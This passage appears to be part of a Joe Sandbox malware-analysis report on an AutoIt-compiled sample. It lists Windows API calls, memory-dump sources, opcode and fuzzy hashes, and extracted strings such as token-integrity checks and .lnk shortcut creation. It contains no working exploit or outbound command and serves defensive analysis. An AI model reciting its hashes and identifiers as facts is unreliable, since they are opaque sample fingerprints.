                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 0cadaa6b6e19dba03ec2728003eb696af84c569eccf1ff5d2b504acb1bb5ea91
                                                    • Instruction ID: 5cd1ac7d1eda1dabd21b3c5839f7ae97b79633359663413f3e469859999a5d2d
                                                    • Opcode Fuzzy Hash: 0cadaa6b6e19dba03ec2728003eb696af84c569eccf1ff5d2b504acb1bb5ea91
                                                    • Instruction Fuzzy Hash: B5216D30801608EFDB149F29DC147E97BAAFB41322F14C226F8119A2F0D3759996DF94
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 006B4ABA
                                                    • __beginthreadex.LIBCMT ref: 006B4AD8
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 006B4AED
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006B4B03
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006B4B0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: e025c865a3796bb6e4782642629f3a0b73bcb8f5467a25503ec6319101abdca1
                                                    • Instruction ID: cb4d701dcd29427609b721fed175abba2189870a2261da966a7f3a7977875ab2
                                                    • Opcode Fuzzy Hash: e025c865a3796bb6e4782642629f3a0b73bcb8f5467a25503ec6319101abdca1
                                                    • Instruction Fuzzy Hash: 371108B6D05214BFC7009FAC9C04ADB7FAEEB89320F14826AF915D3391DA75C94087A0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006A821E
                                                    • GetLastError.KERNEL32(?,006A7CE2,?,?,?), ref: 006A8228
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,006A7CE2,?,?,?), ref: 006A8237
                                                    • HeapAlloc.KERNEL32(00000000,?,006A7CE2,?,?,?), ref: 006A823E
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006A8255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
                                                    • Instruction ID: bdac2eb1c4b8ae44e5b77e7381cbf1cfbfb45430a0619f78ad66cb26ec637130
                                                    • Opcode Fuzzy Hash: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
                                                    • Instruction Fuzzy Hash: E7011271A01644FFDB105FA5DC48DA77B6EEF8A755750057AF849C3260DA319D00DAA0
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?,?,006A7455), ref: 006A7127
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7142
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7150
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?), ref: 006A7160
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A716C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
                                                    • Instruction ID: 7904574d910d015f621583ea9141ee6c2f3b5358ba6fef6e14ec6992df5e49c4
                                                    • Opcode Fuzzy Hash: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
                                                    • Instruction Fuzzy Hash: 38018F72A02204BBDB115F64DC44BAA7BFEEF45791F194065FD05D2220D731DD419FA0
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5260
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B526E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5276
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B5280
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B52BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: d58f90c06a8a223bd9b206607cfa5889aeee01fb4486247451e25d24062cfa00
                                                    • Instruction ID: d9e3c8b41d1040b1063ad4a2947e010fd8f4185c3c5f0d8af76558133b2d2f0d
                                                    • Opcode Fuzzy Hash: d58f90c06a8a223bd9b206607cfa5889aeee01fb4486247451e25d24062cfa00
                                                    • Instruction Fuzzy Hash: D2012971D02A1DDBCF00EFE8ED49AEDBB7AFB09711F40155AE942B2244CB709690C7A5
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8121
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A812B
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A813A
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8141
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8157
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
                                                    • Instruction ID: 0517b894494d7e90653c1461a6b1f905ae15ce218334fa3824d0a36920054b59
                                                    • Opcode Fuzzy Hash: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
                                                    • Instruction Fuzzy Hash: 05F06271701305AFEB111FA5EC88EA73BAEFF4A754B040036F986C7250DB619D41DEA0
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 006AC1F7
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 006AC20E
                                                    • MessageBeep.USER32(00000000), ref: 006AC226
                                                    • KillTimer.USER32(?,0000040A), ref: 006AC242
                                                    • EndDialog.USER32(?,00000001), ref: 006AC25C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 8a693412f20ca39a917d454c26586f132c1415842c8df3dce723ca4f52d67460
                                                    • Instruction ID: 08f76a5c20769f6ee27f7f3304b9af6046328c67ef2d731682e5a8d18d7d6d3e
                                                    • Opcode Fuzzy Hash: 8a693412f20ca39a917d454c26586f132c1415842c8df3dce723ca4f52d67460
                                                    • Instruction Fuzzy Hash: 1201A73080470497EB206B50ED4EB9677BAFB01706F00026AB553914E0D7E0AD448F90
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 006513BF
                                                    • StrokeAndFillPath.GDI32(?,?,0068B888,00000000,?), ref: 006513DB
                                                    • SelectObject.GDI32(?,00000000), ref: 006513EE
                                                    • DeleteObject.GDI32 ref: 00651401
                                                    • StrokePath.GDI32(?), ref: 0065141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: d9c8847aeadf58ea009de0d9ab42514f2fdc0d78c86e51215698792ada93291d
                                                    • Instruction ID: b00e6f5df7dcf6883c90b2077fa7736ea81e5447390c5e0ea0b6d0026448a730
                                                    • Opcode Fuzzy Hash: d9c8847aeadf58ea009de0d9ab42514f2fdc0d78c86e51215698792ada93291d
                                                    • Instruction Fuzzy Hash: 45F0C930405A08EBDB195F2AEC5C7983BE6A741326F08D325E82A895F1C73949A9DF54
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006BC432
                                                    • CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BC44A
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • CoUninitialize.OLE32 ref: 006BC6B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: cbbc7e2280ae23a9ee34f919afba87db78afd1c5869928848c93121dcd552739
                                                    • Instruction ID: 9fa673c6685b16f17f6a0d0bcd34794e86301d6ee09561551a775dd7e000e8e7
                                                    • Opcode Fuzzy Hash: cbbc7e2280ae23a9ee34f919afba87db78afd1c5869928848c93121dcd552739
                                                    • Instruction Fuzzy Hash: B0A16BB1104205AFD340EF54C881EABB7EEEF84315F004A1DF5569B1A2EB70EA09CB66
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                      • Part of subcall function 00657A51: _memmove.LIBCMT ref: 00657AAB
                                                    • __swprintf.LIBCMT ref: 00662ECD
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00662D66
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 00dbfb7da6c1d6e611becb17671567e2a775728a13642d903e0a22d901d03da8
                                                    • Instruction ID: a999bfca5a17b8d10f89c8884c5f565c8382d349f7d76fe24ea78083676c24e4
                                                    • Opcode Fuzzy Hash: 00dbfb7da6c1d6e611becb17671567e2a775728a13642d903e0a22d901d03da8
                                                    • Instruction Fuzzy Hash: D79180711087029FCB54EF24D895CAFB7AAEF85711F00491DF8469B2A1EB30ED49CB66
                                                    APIs
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                    • CoInitialize.OLE32(00000000), ref: 006BB9BB
                                                    • CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BB9D4
                                                    • CoUninitialize.OLE32 ref: 006BB9F1
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                    • String ID: .lnk
                                                    • API String ID: 2126378814-24824748
                                                    • Opcode ID: a8d3924f81eb90a18fc331292bb74698937bb27888fddaa0e95e1074a197bfb3
                                                    • Instruction ID: ffe24536bfba517e8b93852fa3025ecac212bf662ed0004f09228a45e788576e
                                                    • Opcode Fuzzy Hash: a8d3924f81eb90a18fc331292bb74698937bb27888fddaa0e95e1074a197bfb3
                                                    • Instruction Fuzzy Hash: 4CA136B56043019FC710DF24C894D9ABBE6FF89314F148998F8999B3A1CB71ED85CB91
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 006AB4BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%n
                                                    • API String ID: 3565006973-1483441161
                                                    • Opcode ID: c065e10156b507dda9dc7e7145f302a3146564deac8ffe0d1ac9eaac58c3df83
                                                    • Instruction ID: c1f23594bf18bce7b6375c41c7d0ba8ecc6205a65f0c962e860695df91500ccc
                                                    • Opcode Fuzzy Hash: c065e10156b507dda9dc7e7145f302a3146564deac8ffe0d1ac9eaac58c3df83
                                                    • Instruction Fuzzy Hash: A2912870600601DFDB54EF64C894A6AB7EAFF49710F14856DE94A8B292DB71EC41CF60
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 006750AD
                                                      • Part of subcall function 006800F0: __87except.LIBCMT ref: 0068012B
                                                    Strings
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 8b673b1c96871ac5b6e0446aa176b65c12a0c14fc0c8d787203ae47b96754660
                                                    • Instruction ID: 3fa7afa31591f9de0a34117d57f15d62f47ea1090527b832c143ed902fcf57db
                                                    • Opcode Fuzzy Hash: 8b673b1c96871ac5b6e0446aa176b65c12a0c14fc0c8d787203ae47b96754660
                                                    • Instruction Fuzzy Hash: 2A516D3190860186EB917724C8553AE2B979B40710F30CED8E4DA863D9DFB48DDD9B8A
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: 3cf$_f
                                                    • API String ID: 4104443479-1617663849
                                                    • Opcode ID: 9a88d5124b3eef2e18c33babca6c53e0ecfab1738005a4a7abd8d301b47852e3
                                                    • Instruction ID: 62e85a94522db63de86a3cb04c212da736370aeef766ccb0b3ce99aca35454af
                                                    • Opcode Fuzzy Hash: 9a88d5124b3eef2e18c33babca6c53e0ecfab1738005a4a7abd8d301b47852e3
                                                    • Instruction Fuzzy Hash: E4514B70A006099FCF64CF68C884AAEBBF6FF45304F248529E85AD7750EB31A956CB51
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006DF910,00000000,?,?,?,?), ref: 006D79DF
                                                    • GetWindowLongW.USER32 ref: 006D79FC
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006D7A0C
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: d59556741f73f8bbf0aa77bc5bcd6c8ddbc508b6d0f51df0e903d759b9397827
                                                    • Instruction ID: 5037eca0a46f96c2c3803694265470a295f07de4dedf263e0600dbee93b1d83b
                                                    • Opcode Fuzzy Hash: d59556741f73f8bbf0aa77bc5bcd6c8ddbc508b6d0f51df0e903d759b9397827
                                                    • Instruction Fuzzy Hash: B531D032A04606AFDB118F38DC51BEA77AAEB49324F244726F875923E0E730E9518B50
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 006D7B61
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006D7B76
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '$hW
                                                    • API String ID: 3850602802-2162195968
                                                    • Opcode ID: aee0abc84378146ca6e7c1c6a81b61ec3920a51054eda9720582cc9de8506ec2
                                                    • Instruction ID: f92fe881d95ea2eebca75f8ff308ace681877eebf86fe8ec84ff4f1a4c70fcda
                                                    • Opcode Fuzzy Hash: aee0abc84378146ca6e7c1c6a81b61ec3920a51054eda9720582cc9de8506ec2
                                                    • Instruction Fuzzy Hash: 12410874E0520A9FDB14CF68C881BEABBB6FB09304F14416AED04EB391E771A951CF91
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006D7461
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006D7475
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D7499
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: c2ceaabf538f55617618c63c6f827da9d6cecef28d09841353aa39ec96897993
                                                    • Instruction ID: 9ae628f4f71000a580f8473aea2c160ee10d273326ade88da7a588ae01f0dc54
                                                    • Opcode Fuzzy Hash: c2ceaabf538f55617618c63c6f827da9d6cecef28d09841353aa39ec96897993
                                                    • Instruction Fuzzy Hash: 9A21A332900218AFDF128F54CC46FEA3BBAEF48724F110215FE156B2D0DA75AC51DBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006D6D3B
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006D6D4B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006D6D70
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 341f464a471a58f8e549c429eb5e069be0c90ae3f020f55d21681b0eb70a2079
                                                    • Instruction ID: d936b4a64e16a4e671c368644ce580e9c27234af1bfea584e16573186a036daf
                                                    • Opcode Fuzzy Hash: 341f464a471a58f8e549c429eb5e069be0c90ae3f020f55d21681b0eb70a2079
                                                    • Instruction Fuzzy Hash: 36218032A11118BFDF118F54DC45EEB3BBBEF89750F018129F9459B2A0C6719C518BA0
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 006C3A66
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    Strings
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%n
                                                    • API String ID: 3506404897-2057154807
                                                    • Opcode ID: e67b82cd4e6ba4cec71f4a701668890631f793173b18314180825a3dc70259f7
                                                    • Instruction ID: b5b97848575e554120e08e7dc2ee383c1d4fc5c0983ec6d92d5114f9570fbcc5
                                                    • Opcode Fuzzy Hash: e67b82cd4e6ba4cec71f4a701668890631f793173b18314180825a3dc70259f7
                                                    • Instruction Fuzzy Hash: 2A217171600219AFCF50EFA4DC82EAE77B6EF44700F50449DF845AB281DB34EA55CBA9
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006A8C6D
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006A8C84
                                                    • SendMessageW.USER32(?,0000000D,?,00000000), ref: 006A8CBC
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: dccdea112807ec691a0b380ad5e1b66c4b97734bf1e64cb6e5e555e437add72c
                                                    • Instruction ID: 7d08d728bae757f96a5b2db9333f7b31bd03038db65d9eb95db3231c808b4058
                                                    • Opcode Fuzzy Hash: dccdea112807ec691a0b380ad5e1b66c4b97734bf1e64cb6e5e555e437add72c
                                                    • Instruction Fuzzy Hash: B321A432601219BFDF10EBA8D841DAFB7BEEF45350F10445AE506E3250DA71AD448FA4
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @U=u$hW
                                                    • API String ID: 0-4076565667
                                                    • Opcode ID: aef5977a375ff3231726c27b2df2720ec0904adc0daefd6cfa3fea3a8f382052
                                                    • Instruction ID: 525877593b2e11f59c8a1a1f3577e51d3deb50273d15d6296e649619a96fe2a8
                                                    • Opcode Fuzzy Hash: aef5977a375ff3231726c27b2df2720ec0904adc0daefd6cfa3fea3a8f382052
                                                    • Instruction Fuzzy Hash: 7C216D35924108BFEB148F58CC45FFA37A6EB0A310F404166FA16DA3E0D671EA51DB70
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006D7772
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006D7787
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006D7794
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: de41ede2ff7b33ae71e0a79ecc3dd0a907c7359c877b972cb1ce4d710ce7bea6
                                                    • Instruction ID: 7037381f22836724763f84e89ffceee957f7dfd90d543b84b7a72ef464621bf8
                                                    • Opcode Fuzzy Hash: de41ede2ff7b33ae71e0a79ecc3dd0a907c7359c877b972cb1ce4d710ce7bea6
                                                    • Instruction Fuzzy Hash: DC113A72600208BFEF105F64CC01FDB37AAEF89B54F01461DFA45962D0D271E811CB10
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 006D69A2
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006D69B1
